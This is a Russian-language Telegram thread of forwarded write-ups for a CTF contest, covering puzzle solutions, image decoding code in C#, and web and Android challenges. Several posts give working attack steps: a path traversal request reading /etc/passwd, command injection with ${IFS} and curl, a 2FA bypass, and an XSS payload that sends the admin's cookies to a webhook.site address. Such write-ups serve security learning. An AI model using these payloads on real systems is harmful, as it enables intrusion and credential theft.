Forwarded from Дядя Кит
1trzy4vvAsY_20230715-081701_060m00s_0720p~INCOMPLETE96aa02c.mkv
12 MB
Миелофононаблюдение.
Идем на стрим, втыкаем пару часов в слегка меняющуюся картинку. Потом вспоминаем, что скоро спать пора и качаем с репы на гитхабе yrewind.
Видим, что где-то в 8:16 миелофон еще был на скамейке и валяем ченить вроде
Конца скачивания не дожидаемся, все равно эта тулза сохраняет в mkv и сразу же идем смотреть на капибару
Идем на стрим, втыкаем пару часов в слегка меняющуюся картинку. Потом вспоминаем, что скоро спать пора и качаем с репы на гитхабе yrewind.
Видим, что где-то в 8:16 миелофон еще был на скамейке и валяем ченить вроде
.\yrewind.exe -url=https://www.youtube.com/watch?v=1trzy4vvAsY -start=20230715:0817 -duration=60Конца скачивания не дожидаемся, все равно эта тулза сохраняет в mkv и сразу же идем смотреть на капибару
👍5
Гнвоерк
Здесь всё относительно просто: надо много терпения, чтобы взять 10 итераций вордла... ну или же воспользоваться тулзой от @dsalakhov:
Здесь всё относительно просто: надо много терпения, чтобы взять 10 итераций вордла... ну или же воспользоваться тулзой от @dsalakhov:
❤1
Forwarded from Дaнияp
Привет, для Гнвоерк написал скрипт:
https://github.com/X-OrBit/MultipleWordleSolver/tree/main
https://github.com/X-OrBit/MultipleWordleSolver/tree/main
GitHub
GitHub - X-OrBit/MultipleWordleSolver: Код для решения нескольких Wordle с соревнования Tinkoff CTF
Код для решения нескольких Wordle с соревнования Tinkoff CTF - X-OrBit/MultipleWordleSolver
❤1🔥1
Forwarded from Дядя Кит
Люди в… каком?
Качаем пнг, смотрим на закодированную пикчу.
Скармливаем сайту картинки размером в несколько пикселей и убеждаемся, что стиратель только меняет местами пиксели, но не их цвет.
Делаем белую картинку размером с flashied.png (точно) и оставляем на ней один яркий пиксель. Видим, что его закинуло в рандомное место.
Добавляем к предыдущей картинке второй пиксель и делаем вывод, что пиксели друг на друга не влияют. Осталось дело за малым - собсна расшифровать пикчу.
Первым делом делаем пикчу такого же размера, но с уникальным цветом каждого пикселя.
Чтобы сохранить расположение пикселя, делаем дбконтекст и модельки для всей этой радости:
Затем рисуем собсна саму пикчу с градиентами
Совсем забыл, для того, чтобы битмап работал сильно быстрее (без накладных расходов на кучу всего) я сделал свой directbitmap с блекджеком и куртизанками. В демонстрационных целях можно с дефолтным.
А еще в net core просто так нет system drawing и поэтому надо подключить пакет Microsoft.Windows.Compatibility
Скармливаем градиент сайту и получаем на выходе нужную нам пикчу. Сопоставляем исходные и конечные позиции
Затем осталось самое простое - сопоставить финальные значения пикчи из условия и заведомо известные исходные значения. Заварите кофейку, оптимизации завезли только чуть-чуть
Ну собсна и все. Конца выполнения можно и не ждать
Качаем пнг, смотрим на закодированную пикчу.
Скармливаем сайту картинки размером в несколько пикселей и убеждаемся, что стиратель только меняет местами пиксели, но не их цвет.
Делаем белую картинку размером с flashied.png (точно) и оставляем на ней один яркий пиксель. Видим, что его закинуло в рандомное место.
Добавляем к предыдущей картинке второй пиксель и делаем вывод, что пиксели друг на друга не влияют. Осталось дело за малым - собсна расшифровать пикчу.
Первым делом делаем пикчу такого же размера, но с уникальным цветом каждого пикселя.
Чтобы сохранить расположение пикселя, делаем дбконтекст и модельки для всей этой радости:
using System.ComponentModel.DataAnnotations;
public class Context : DbContext
{
public Context()
{
DbLoggerCategory.Database.OpenConnection();
Database.EnsureCreated();
}
public DbSet<Pixel> Pixels { get; set; }
// The following configures EF to create a Sqlite database file in the
// special "local" folder for your platform.
protected override void OnConfiguring(DbContextOptionsBuilder options) =>
options.UseSqlite("Data Source=C:\\Games\\vms\\memory\\data.db");
}
public class Pixel
{
public Pixel(int colorArgb, int beforeX, int beforeY, int afterX, int afterY)
{
ColorArgb = colorArgb;
BeforeX = beforeX;
BeforeY = beforeY;
AfterX = afterX;
AfterY = afterY;
}
[Key]
public int ColorArgb { get; set; }
public int BeforeX { get; set; }
public int BeforeY { get; set; }
public int AfterX { get; set; }
public int AfterY { get; set; }
}
Затем рисуем собсна саму пикчу с градиентами
using System.Drawing;
#pragma warning disable CA1416
var dbitmap = new DirectBitmap(777, 437);
for (var x = 0; x < dbitmap.Width; x++)
for (var y = 0; y < dbitmap.Height; y++)
{
var r = x % 255;
var g = y % 255;
var b = (x / 255 + 1) * (y / 255 + 10);
dbitmap.SetPixel(x, y, Color.FromArgb(r, g, b));
db.Pixels.Add(new Pixel(Color.FromArgb(r, g, b).ToArgb(), x, y, 0, 0));
}
dbitmap.Bitmap.Save("C:\\Games\\vms\\memory\\gradient.png");
db.SaveChanges();
Совсем забыл, для того, чтобы битмап работал сильно быстрее (без накладных расходов на кучу всего) я сделал свой directbitmap с блекджеком и куртизанками. В демонстрационных целях можно с дефолтным.
А еще в net core просто так нет system drawing и поэтому надо подключить пакет Microsoft.Windows.Compatibility
Скармливаем градиент сайту и получаем на выходе нужную нам пикчу. Сопоставляем исходные и конечные позиции
using var db = new Context();
var bitmap = new Bitmap("C:\\Games\\vms\\memory\\noname.png");
for (var x = 0; x < bitmap.Width; x++)
for (var y = 0; y < bitmap.Height; y++)
{
var pixel = bitmap.GetPixel(x, y);
var dbpixel = db.Pixels.First(p => p.ColorArgb == pixel.ToArgb());
dbpixel.AfterX = x;
dbpixel.AfterY = y;
}
db.SaveChanges();
Затем осталось самое простое - сопоставить финальные значения пикчи из условия и заведомо известные исходные значения. Заварите кофейку, оптимизации завезли только чуть-чуть
using var db = new Context();
var bitmap = new Bitmap("C:\\Games\\vms\\memory\\flashiedю3.png");
var dbitmap = new DirectBitmap(777, 437);
var pixels = db.Pixels.ToList();
pixels.Sort((p1, p2) => p1.AfterX.CompareTo(p2.AfterX));
for (var x = 0; x < bitmap.Width; x++)
{
Stopwatch sw = new Stopwatch();
sw.Start();
for (var y = 0; y < bitmap.Height; y++)
{
var pixel = bitmap.GetPixel(x, y);
var dbpixel = pixels.First(p => p.AfterX == x && p.AfterY == y);
dbitmap.SetPixel(dbpixel.BeforeX, dbpixel.BeforeY, pixel);
}
sw.Stop();
Console.WriteLine(sw.Elapsed);
Console.WriteLine(x);
if(x % 5 == 0)
dbitmap.Bitmap.Save("C:\\Games\\vms\\memory\\flag4.png");
}
Ну собсна и все. Конца выполнения можно и не ждать
👍1💩1
Forwarded from Дядя Кит
Иван Васильевич
Тут вообще ничего сложного нет. Читаем на вики про CVE, читаем на вики про JPG, открываем любым бинарным редактором и стираем из середины метку конца 0xFFD9
Потом читаем еще раз спеку и расшишериваем пикчу редактированием метки 0xFFC0 (на пикче line NB и samples/line)
Вниз можно расшишеривать пока совесть позволяет, а вот в сторону придется подобрать (читаем про бинарный поиск или тупо брутфорсим скриптом).
Кода не будет, я его успешно потер, но там где-то около 350-400 семплов.
Внимание, подвох: в браузере, телеге, виндовых фотографиях и иже с ними вы ничо не увидите. Лично я открывал в JB Rider
Тут вообще ничего сложного нет. Читаем на вики про CVE, читаем на вики про JPG, открываем любым бинарным редактором и стираем из середины метку конца 0xFFD9
Потом читаем еще раз спеку и расшишериваем пикчу редактированием метки 0xFFC0 (на пикче line NB и samples/line)
Вниз можно расшишеривать пока совесть позволяет, а вот в сторону придется подобрать (читаем про бинарный поиск или тупо брутфорсим скриптом).
Кода не будет, я его успешно потер, но там где-то около 350-400 семплов.
Внимание, подвох: в браузере, телеге, виндовых фотографиях и иже с ними вы ничо не увидите. Лично я открывал в JB Rider
Forwarded from Дядя Кит
Бредущий по лезвию
Тут тоже все максимально просто.
Заходим, видим 403, выходим.
Открываем консоль, пишем
Видим чета на 9090. Открываем свой богатый жизненный опыт, широкий кругозор и вспоминаем, что на 9090 порту обычно обитает прометеус. Идем на адрес
Идем по этому домену, дописываем в конец /storage и смотрим на флаг
Тут тоже все максимально просто.
Заходим, видим 403, выходим.
Открываем консоль, пишем
nmap -p0- %url%Видим чета на 9090. Открываем свой богатый жизненный опыт, широкий кругозор и вспоминаем, что на 9090 порту обычно обитает прометеус. Идем на адрес
.spbctf.ru:9090/metrics и наблюдаем там статистику от its-private-domain-for-secure-android-storage.Идем по этому домену, дописываем в конец /storage и смотрим на флаг
Forwarded from Дaнияp
galya.py
5.7 KB
Великая отмена
введем в коде две рандомные почты
запускаем код в несколько процессов, сначала ~5-10 canceler'ов, после один sender
скрипт автоматически создаст аккаунты и начнет отменять одну и ту же транзакцию, в следствие чего, в первом аккаунте будут фармятся шиитакоины
далее вручную покупаем чайный гриб и получаем нужный флаг (данные от аккаунта будут лежать в папке accounts около скрипта)
введем в коде две рандомные почты
запускаем код в несколько процессов, сначала ~5-10 canceler'ов, после один sender
скрипт автоматически создаст аккаунты и начнет отменять одну и ту же транзакцию, в следствие чего, в первом аккаунте будут фармятся шиитакоины
далее вручную покупаем чайный гриб и получаем нужный флаг (данные от аккаунта будут лежать в папке accounts около скрипта)
Forwarded from Дaнияp
вот еще райтапчик на великую отмену :)
Forwarded from Дядя Кит
Тайна четвертой планеты
Достаем бочку охлаждающей жидкости для меня.
Идем на сайт, шаримся по залитым файлам. Недоумеваем с людей, которые сканируют файловую систему контейнера с питоном в их собственном браузере, а потом кричат в чате про потертые файлы и поломанное задание.
Вправляем челюсть взад и смотрим на адресную строку. Похоже, что тут пахнет LFI. Проверяем.
Делаем ашыпку в запросе и наблюдаем ошибку 500 с кишками наружу.
Делаем запрос
Успешно получаем passwd.
Дальше отправляем через HttpClient файл с названием
Внутрь кладем JSP код с поиском и выводом директорий рута. Узнаем название файла и забираем флаг
Конец собсна, больше мне рассказать нечего.
С вами был @1dndn, яростно довольный своим сорок пятым местом
Достаем бочку охлаждающей жидкости для меня.
Идем на сайт, шаримся по залитым файлам. Недоумеваем с людей, которые сканируют файловую систему контейнера с питоном в их собственном браузере, а потом кричат в чате про потертые файлы и поломанное задание.
Вправляем челюсть взад и смотрим на адресную строку. Похоже, что тут пахнет LFI. Проверяем.
Делаем ашыпку в запросе и наблюдаем ошибку 500 с кишками наружу.
Делаем запрос
https://.spbctf.ru/view.jsp?file=/../../../../../../etc/passwdУспешно получаем passwd.
Дальше отправляем через HttpClient файл с названием
../something.jsp (c# не файловая система, слеши в названии стерпит) и вызываем его.Внутрь кладем JSP код с поиском и выводом директорий рута. Узнаем название файла и забираем флаг
Конец собсна, больше мне рассказать нечего.
С вами был @1dndn, яростно довольный своим сорок пятым местом
👍3
Forwarded from Дядя Кит
Планетарная важность.
Открываем сайт, жмем F12.
Наблюдаем запрос
Делаем такой же, но
Далее вставляем везде вместо пробелов` ${IFS}`, читаем файлы и все такое.
Когда надоест, делаем
Теперь точно все
Открываем сайт, жмем F12.
Наблюдаем запрос
execute?cmd=get-statusДелаем такой же, но
execute?cmd=lsДалее вставляем везде вместо пробелов` ${IFS}`, читаем файлы и все такое.
Когда надоест, делаем
execute?cmd=curl${IFS}-s${IFS}http://management:5000/restart/ и радуемся флагу.Теперь точно все
❤1
Forwarded from Dmitry
Герой Пустошей (Аквачип)
Android .apk
Первая часть:
Скачиваем aquachip.apk и устанавливаем на эмулятор.
При попытке установки скорее всего adb зависнет,
а если перетягивать на эмулятор - молча падает.
Чтобы понять в чём ошибка, нужно закинуть .apk файл на эмулятор:
После этого установить с помощью PM (Packet Manager) внутри Anroid:
Получится ошибка:
Это означает, что не подходит архитектура процессора для нативных библиотек.
Запускаем реверс:
или же просто распаковываем .apk как зип архив.
В файлах видим: lib/
arm64-v8a, armeabi-v7a, x86_64
Из-за этих библиотек и падает (нет варианта для обычного эмулятора).
x86_64 - нужный вид эмулятора.
Устанавливаем такой эмулятор (например, через Android Studio) и запускаем на нём.
Часть вторая:
Настраиваем эмулятор для перехвата траффика
Вот статья: (book.hacktricks.xyz /mobile-pentesting/android-app-pentesting/avd-android-virtual-device)
В приложении включаем все переключатели и пробуем запустить, получаем ошибку
"Secret Module not enabled".
В Burp видно, что каждый модуль при включении посылает запрос с id= [номер модуля]
В repeater посылаем такой же запрос, но со следующим номером по порядку после всех модулей.
После этого Аквачип работает.
Android .apk
Первая часть:
Скачиваем aquachip.apk и устанавливаем на эмулятор.
При попытке установки скорее всего adb зависнет,
а если перетягивать на эмулятор - молча падает.
Чтобы понять в чём ошибка, нужно закинуть .apk файл на эмулятор:
adb push aqua.apk /sdcard/DownloadПосле этого установить с помощью PM (Packet Manager) внутри Anroid:
adb shellcd /sdcard/Downloadpm install aqua.apkПолучится ошибка:
Failure [INSTALL_FAILED_NO_MATCHING_ABIS: Failed to extract native libraries, res=-113]Это означает, что не подходит архитектура процессора для нативных библиотек.
Запускаем реверс:
apktool d -o aqua-backsmali aqua.apkили же просто распаковываем .apk как зип архив.
В файлах видим: lib/
arm64-v8a, armeabi-v7a, x86_64
Из-за этих библиотек и падает (нет варианта для обычного эмулятора).
x86_64 - нужный вид эмулятора.
Устанавливаем такой эмулятор (например, через Android Studio) и запускаем на нём.
Часть вторая:
Настраиваем эмулятор для перехвата траффика
Вот статья: (book.hacktricks.xyz /mobile-pentesting/android-app-pentesting/avd-android-virtual-device)
В приложении включаем все переключатели и пробуем запустить, получаем ошибку
"Secret Module not enabled".
В Burp видно, что каждый модуль при включении посылает запрос с id= [номер модуля]
В repeater посылаем такой же запрос, но со следующим номером по порядку после всех модулей.
После этого Аквачип работает.
👍1
Forwarded from Dmitry
NAMCAP
Gamechanger (Pacman)
android, .apk
Если покопаться в коде,
в классе с запросами в сеть есть debug функция loginAdmin, где прописан пароль админа.
Запускаем приложение, заходим в Settings, там написан логин админа.
На форме входа вводим логин и пароль админа, но у него включена 2FA.
Высылается одноразовый пароль.
Приложение спамит уведомлениями при этом.
При логине нам выдало токен, но все остальные методы не работают, требуют 2FA.
Уязвимость заключается в том, что работает метод просмотра уведомлений с токеном до того как будет пройдена 2FA.
Конструируем в repeater запрос уведомлений с токеном админа и там будет OTP.
Заходим и переключаем в настройках Gamechanger.
Gamechanger (Pacman)
android, .apk
Если покопаться в коде,
в классе с запросами в сеть есть debug функция loginAdmin, где прописан пароль админа.
Запускаем приложение, заходим в Settings, там написан логин админа.
На форме входа вводим логин и пароль админа, но у него включена 2FA.
Высылается одноразовый пароль.
Приложение спамит уведомлениями при этом.
При логине нам выдало токен, но все остальные методы не работают, требуют 2FA.
Уязвимость заключается в том, что работает метод просмотра уведомлений с токеном до того как будет пройдена 2FA.
Конструируем в repeater запрос уведомлений с токеном админа и там будет OTP.
Заходим и переключаем в настройках Gamechanger.
Forwarded from Innokentiy 🍏 🍎 Memskoy
Песчаный холм: когда в AES ключ совпадает с IV, достаточно иметь данные вида X + 0 + X, где X — 16 каких-то байт, 0 — 16 нулевых байт, тогда в результате декодинга спалится ключ
Forwarded from Innokentiy 🍏 🍎 Memskoy
Forwarded from Dimisi
Мегастог: XSS в поле address формы регистрации. Крадем куки админа <noscript>document.location='https://webhook.site/776b5bec-1809-462d-a9fa-280952a93dc6?cookie='+document.cookie;</noscript> и открываем admin-dashboard.